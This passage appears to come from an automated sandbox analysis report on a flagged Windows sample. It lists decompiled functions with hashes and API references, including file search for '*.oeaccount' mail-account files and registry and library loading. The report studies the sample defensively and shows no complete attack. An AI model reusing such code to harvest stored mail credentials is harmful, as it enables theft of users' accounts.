                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$DeleteIconLoadObject
                                                                                              • String ID:
                                                                                              • API String ID: 1986663749-0
                                                                                              • Opcode ID: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                                              • Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
                                                                                              • Opcode Fuzzy Hash: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                                              • Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00411932, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 72%
                                                                                              			E00411932() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x417528;
				if(_t1 != 0) {
					_push(_t1);
					L004115D6();
				}
				_t2 =  *0x417530;
				if(_t2 != 0) {
					_push(_t2); // executed
					L004115D6(); // executed
				}
				_t3 =  *0x41752c;
				if(_t3 != 0) {
					_push(_t3);
					L004115D6();
				}
				_t4 =  *0x417534;
				if(_t4 != 0) {
					_push(_t4); // executed
					L004115D6(); // executed
					return _t4;
				}
				return _t4;
			}







                                                                                              0x00411932
                                                                                              0x00411939
                                                                                              0x0041193b
                                                                                              0x0041193c
                                                                                              0x00411941
                                                                                              0x00411942
                                                                                              0x00411949
                                                                                              0x0041194b
                                                                                              0x0041194c
                                                                                              0x00411951
                                                                                              0x00411952
                                                                                              0x00411959
                                                                                              0x0041195b
                                                                                              0x0041195c
                                                                                              0x00411961
                                                                                              0x00411962
                                                                                              0x00411969
                                                                                              0x0041196b
                                                                                              0x0041196c
                                                                                              0x00000000
                                                                                              0x00411971
                                                                                              0x00411972

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                              • Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
                                                                                              • Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                              • Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040787D, Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 78%
                                                                                              			E0040787D() {
				void* _t13;
				signed int _t16;
				signed int _t18;
				signed int _t27;
				signed int _t29;
				intOrPtr _t33;

				_t33 =  *0x417540;
				if(_t33 == 0) {
					_push(0x8000);
					 *0x417540 = 0x8000;
					 *0x417544 = 0x100;
					 *0x417548 = 0x1000; // executed
					L004115D0(); // executed
					 *0x417528 = 0x8000;
					_t27 = 4;
					_t16 =  *0x417544 * _t27;
					_push( ~(0 | _t33 > 0x00000000) | _t16);
					L004115D0();
					 *0x417530 = _t16;
					_t29 = 4;
					_t18 =  *0x417544 * _t29;
					_push( ~(0 | _t33 > 0x00000000) | _t18);
					L004115D0();
					_push( *0x417548);
					 *0x417534 = _t18; // executed
					L004115D0(); // executed
					 *0x41752c = _t18;
					return _t18;
				}
				return _t13;
			}









                                                                                              0x0040787d
                                                                                              0x00407884
                                                                                              0x0040788b
                                                                                              0x0040788c
                                                                                              0x00407891
                                                                                              0x0040789b
                                                                                              0x004078a5
                                                                                              0x004078aa
                                                                                              0x004078b8
                                                                                              0x004078b9
                                                                                              0x004078c2
                                                                                              0x004078c3
                                                                                              0x004078c8
                                                                                              0x004078d6
                                                                                              0x004078d7
                                                                                              0x004078e0
                                                                                              0x004078e1
                                                                                              0x004078e6
                                                                                              0x004078ec
                                                                                              0x004078f1
                                                                                              0x004078f9
                                                                                              0x00000000
                                                                                              0x004078f9
                                                                                              0x004078fe

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1033339047-0
                                                                                              • Opcode ID: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                                              • Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
                                                                                              • Opcode Fuzzy Hash: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                                              • Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004060FA, Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004060FA(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						 *__eax =  *__eax + _a8;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13);
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                              0x004060fa
                                                                                              0x004060fb
                                                                                              0x004060ff
                                                                                              0x0040614a
                                                                                              0x00406101
                                                                                              0x00406102
                                                                                              0x00406104
                                                                                              0x00406108
                                                                                              0x0040610a
                                                                                              0x0040610c
                                                                                              0x00406116
                                                                                              0x0040611e
                                                                                              0x00406120
                                                                                              0x00406124
                                                                                              0x0040612e
                                                                                              0x00406133
                                                                                              0x00406137
                                                                                              0x0040613c
                                                                                              0x00406146
                                                                                              0x00406146

                                                                                              APIs
                                                                                              • malloc.MSVCRT ref: 00406116
                                                                                              • memcpy.MSVCRT ref: 0040612E
                                                                                              • free.MSVCRT(00000000,00000000,75144DE0,00406B49,00000001,?,00000000,75144DE0,00406D88,00000000,?,?), ref: 00406137
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: freemallocmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3056473165-0
                                                                                              • Opcode ID: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                                              • Instruction ID: d153bd7f556b54fa1e8e463c7175d954409fdcf13f6af5892cc53e784d19f72a
                                                                                              • Opcode Fuzzy Hash: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                                              • Instruction Fuzzy Hash: 9DF0E9726052219FC7089F79B98145BB3DDAF84324B11482FF546D7292D7389C50C798
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B8D7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 93%
                                                                                              			E0040B8D7(void* __edi, void* __eflags) {
				void* __esi;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr _t38;
				void* _t42;
				void* _t45;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t54 = __eflags;
				_t49 = __edi;
				_t38 = 0;
				E004023D4( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
				 *((intOrPtr*)(__edi + 0x108)) = 0;
				E00401E8B(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
				_t24 =  *((intOrPtr*)(__edi + 0x37c));
				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
					_t51 = 0x412466;
				} else {
					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
						_t45 = 0;
						__eflags = 0;
					} else {
						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
					}
					_t51 = _t45;
				}
				_push(_t51);
				_push("/stext");
				L004115B2();
				if(_t24 != 0) {
					_t52 = E0040B841(_t24, _t51);
					__eflags = _t52 - _t38;
					if(_t52 <= _t38) {
						goto L15;
					}
					goto L9;
				} else {
					_t52 = 1;
					L9:
					E0040AF17(_t49, _t38); // executed
					E0040A5AC(_t49);
					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
						_t42 = 0x412466;
					} else {
						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
							_t42 = 0;
						} else {
							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
					E00409B32( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
					_t38 = 1;
					E0040B0C2(_t49);
					L15:
					return _t38;
				}
			}












                                                                                              0x0040b8d7
                                                                                              0x0040b8d7
                                                                                              0x0040b8e0
                                                                                              0x0040b8e4
                                                                                              0x0040b8f5
                                                                                              0x0040b8fb
                                                                                              0x0040b900
                                                                                              0x0040b909
                                                                                              0x0040b920
                                                                                              0x0040b90b
                                                                                              0x0040b90e
                                                                                              0x0040b91a
                                                                                              0x0040b91a
                                                                                              0x0040b910
                                                                                              0x0040b915
                                                                                              0x0040b915
                                                                                              0x0040b91c
                                                                                              0x0040b91c
                                                                                              0x0040b925
                                                                                              0x0040b926
                                                                                              0x0040b92b
                                                                                              0x0040b934
                                                                                              0x0040b940
                                                                                              0x0040b942
                                                                                              0x0040b944
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040b936
                                                                                              0x0040b938
                                                                                              0x0040b946
                                                                                              0x0040b949
                                                                                              0x0040b950
                                                                                              0x0040b955
                                                                                              0x0040b95f
                                                                                              0x0040b976
                                                                                              0x0040b961
                                                                                              0x0040b961
                                                                                              0x0040b965
                                                                                              0x0040b972
                                                                                              0x0040b967
                                                                                              0x0040b96d
                                                                                              0x0040b96d
                                                                                              0x0040b965
                                                                                              0x0040b98b
                                                                                              0x0040b998
                                                                                              0x0040b9a1
                                                                                              0x0040b9a2
                                                                                              0x0040b9a8
                                                                                              0x0040b9ac
                                                                                              0x0040b9ac

                                                                                              APIs
                                                                                                • Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
                                                                                                • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
                                                                                                • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
                                                                                                • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
                                                                                                • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28
                                                                                              • _stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strlen$_stricmpmemset
                                                                                              • String ID: /stext
                                                                                              • API String ID: 3575250601-3817206916
                                                                                              • Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                                              • Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
                                                                                              • Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                                              • Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406252, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406252() {
				struct tagLOGFONTA _v64;
				struct HFONT__* _t6;

				E00406191( &_v64, "Arial", 0xe, 0);
				_t6 = CreateFontIndirectA( &_v64); // executed
				return _t6;
			}





                                                                                              0x00406264
                                                                                              0x00406270
                                                                                              0x00406277

                                                                                              APIs
                                                                                                • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                                                • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00406270
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFontIndirectmemsetstrcpy
                                                                                              • String ID: Arial
                                                                                              • API String ID: 3275230829-493054409
                                                                                              • Opcode ID: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                                                              • Instruction ID: 9d865b7f43533acfebf3b00b6ce8d331e43bccbbf35dbaed0a6f3a0435680c9f
                                                                                              • Opcode Fuzzy Hash: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                                                              • Instruction Fuzzy Hash: B3D0C970E4020D76E600BAA0FD07B897BAC5B00605F508421BA41F51E2FAE8A15586A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004047A0, Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004047A0(CHAR* __esi, void* __eflags) {
				struct HINSTANCE__* _t8;
				char _t12;
				char* _t15;
				CHAR* _t17;

				_t17 = __esi;
				E004047F1(__esi);
				_t8 = LoadLibraryA(__esi); // executed
				__esi[0x200] = _t8;
				if(_t8 != 0) {
					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
					__esi[0x208] = _t12;
					if(_t12 != 0) {
						__esi[0x204] = 1;
					}
				}
				_t15 =  &(_t17[0x204]);
				if( *_t15 == 0) {
					E004047F1(_t17);
				}
				return  *_t15;
			}







                                                                                              0x004047a0
                                                                                              0x004047a2
                                                                                              0x004047a8
                                                                                              0x004047b0
                                                                                              0x004047b6
                                                                                              0x004047c0
                                                                                              0x004047c8
                                                                                              0x004047ce
                                                                                              0x004047d0
                                                                                              0x004047d0
                                                                                              0x004047ce
                                                                                              0x004047db
                                                                                              0x004047e4
                                                                                              0x004047e8
                                                                                              0x004047e8
                                                                                              0x004047f0

                                                                                              APIs
                                                                                                • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                              • LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID:
                                                                                              • API String ID: 145871493-0
                                                                                              • Opcode ID: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                                              • Instruction ID: bd92e302f737a6b7e7c2aa8ed3bd721d1bcdfa8038008227cdd2def65d6b9a1b
                                                                                              • Opcode Fuzzy Hash: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                                                              • Instruction Fuzzy Hash: F1F039B02007028BD7209F39D84879B77E8BF85700F00853EF266E3281EB78A951CB28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040EB0E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetPrivateProfileIntA.KERNEL32 ref: 0040EB35
                                                                                                • Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
                                                                                                • Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
                                                                                                • Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                              • String ID:
                                                                                              • API String ID: 4165544737-0
                                                                                              • Opcode ID: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                                              • Instruction ID: f55a197cdd86fa31c53d12907dd8f70643f2484b8232c3448506387801693677
                                                                                              • Opcode Fuzzy Hash: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                                                              • Instruction Fuzzy Hash: F2E0B632000109FBCF125F95EC01AAA7F76FF08314F148869FD5855161D332A570EF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004047F1, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004047F1(void* __eax) {
				struct HINSTANCE__* _t5;
				signed int* _t7;

				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
				_t7 = __eax + 0x200;
				_t5 =  *_t7;
				if(_t5 != 0) {
					_t5 = FreeLibrary(_t5); // executed
					 *_t7 =  *_t7 & 0x00000000;
				}
				return _t5;
			}





                                                                                              0x004047f1
                                                                                              0x004047f9
                                                                                              0x004047ff
                                                                                              0x00404803
                                                                                              0x00404806
                                                                                              0x0040480c
                                                                                              0x0040480c
                                                                                              0x00404810

                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                                              • Instruction ID: 9a892a7b4d94419058e15305363ecf1fbcdc16662e35282e5c511663eadef616
                                                                                              • Opcode Fuzzy Hash: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                                                              • Instruction Fuzzy Hash: 90D012721003118FD7705F14EC0CBE133E8AF40312F2584B8EA55E7155C3749584CA58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405EE4, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405EE4(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}




                                                                                              0x00405ef6
                                                                                              0x00405efc

                                                                                              APIs
                                                                                              • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                                              • Instruction ID: 5973f86ffe51395cbbea2b6db375788de2bc2c82441068c359f9d196895a4387
                                                                                              • Opcode Fuzzy Hash: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                                              • Instruction Fuzzy Hash: F7C092B0290201BEFF208A10AD0AF77295DE780700F10C4207A00E40E0D2A14C109A24
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E894, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040E894(void* __esi) {
				struct HINSTANCE__* _t6;
				int _t7;

				_t6 =  *(__esi + 8);
				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
				if(_t6 != 0) {
					_t7 = FreeLibrary(_t6); // executed
					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
					return _t7;
				}
				return _t6;
			}





                                                                                              0x0040e894
                                                                                              0x0040e897
                                                                                              0x0040e89d
                                                                                              0x0040e8a0
                                                                                              0x0040e8a6
                                                                                              0x00000000
                                                                                              0x0040e8a6
                                                                                              0x0040e8aa

                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                                              • Instruction ID: 5028da6d49437ecb3f89885db84a6a431b650c8c1a4919c17fb61c23058b4b99
                                                                                              • Opcode Fuzzy Hash: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                                              • Instruction Fuzzy Hash: 80C04C31110B018FE7219B12C949753B7E4BF00317F44C868955BD58A4D77CE4A4CE18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040ED91, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040ED91(struct HINSTANCE__* _a4, CHAR* _a8) {

				EnumResourceNamesA(_a4, _a8, E0040ED0B, 0); // executed
				return 1;
			}



                                                                                              0x0040eda0
                                                                                              0x0040eda9

                                                                                              APIs
                                                                                              • EnumResourceNamesA.KERNEL32 ref: 0040EDA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EnumNamesResource
                                                                                              • String ID:
                                                                                              • API String ID: 3334572018-0
                                                                                              • Opcode ID: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                                              • Instruction ID: b68387c5c0e4344f5c23b4f6c0320e636f75da40900f583e81955e3ef688938f
                                                                                              • Opcode Fuzzy Hash: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                                              • Instruction Fuzzy Hash: 11C09B31594342D7C7119F109D09F1B7A95FF58701F158C3D7251D40E0C7614034D605
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406F5B, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406F5B(signed int* __esi) {
				int _t2;
				void* _t3;

				_t3 =  *__esi;
				if(_t3 != 0xffffffff) {
					_t2 = FindClose(_t3); // executed
					 *__esi =  *__esi | 0xffffffff;
					return _t2;
				}
				return 0;
			}





                                                                                              0x00406f5b
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f6b
                                                                                              0x00000000
                                                                                              0x00406f6b
                                                                                              0x00406f6e

                                                                                              APIs
                                                                                              • FindClose.KERNELBASE(?,00406E75,?,?,00000000,rA,00410C7E,*.oeaccount,rA,?,00000104), ref: 00406F65
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              • Opcode ID: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                                              • Instruction ID: b31b0b49456476ea20311e3f3804ac2d10f8d6de1d59c17087b16cfdac6e9e38
                                                                                              • Opcode Fuzzy Hash: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                                              • Instruction Fuzzy Hash: 67C048351145029AD22C9B38AA5942A77A2AA493303B50B6CB1F3D20E0E77884628A04
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040614B, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040614B(CHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesA(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}




                                                                                              0x0040614f
                                                                                              0x0040615f

                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                              • Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
                                                                                              • Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                                              • Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040EB3F, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040EB3F(void* _a4, char* _a8, void** _a12) {
				long _t4;

				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
				return _t4;
			}




                                                                                              0x0040eb52
                                                                                              0x0040eb58

                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
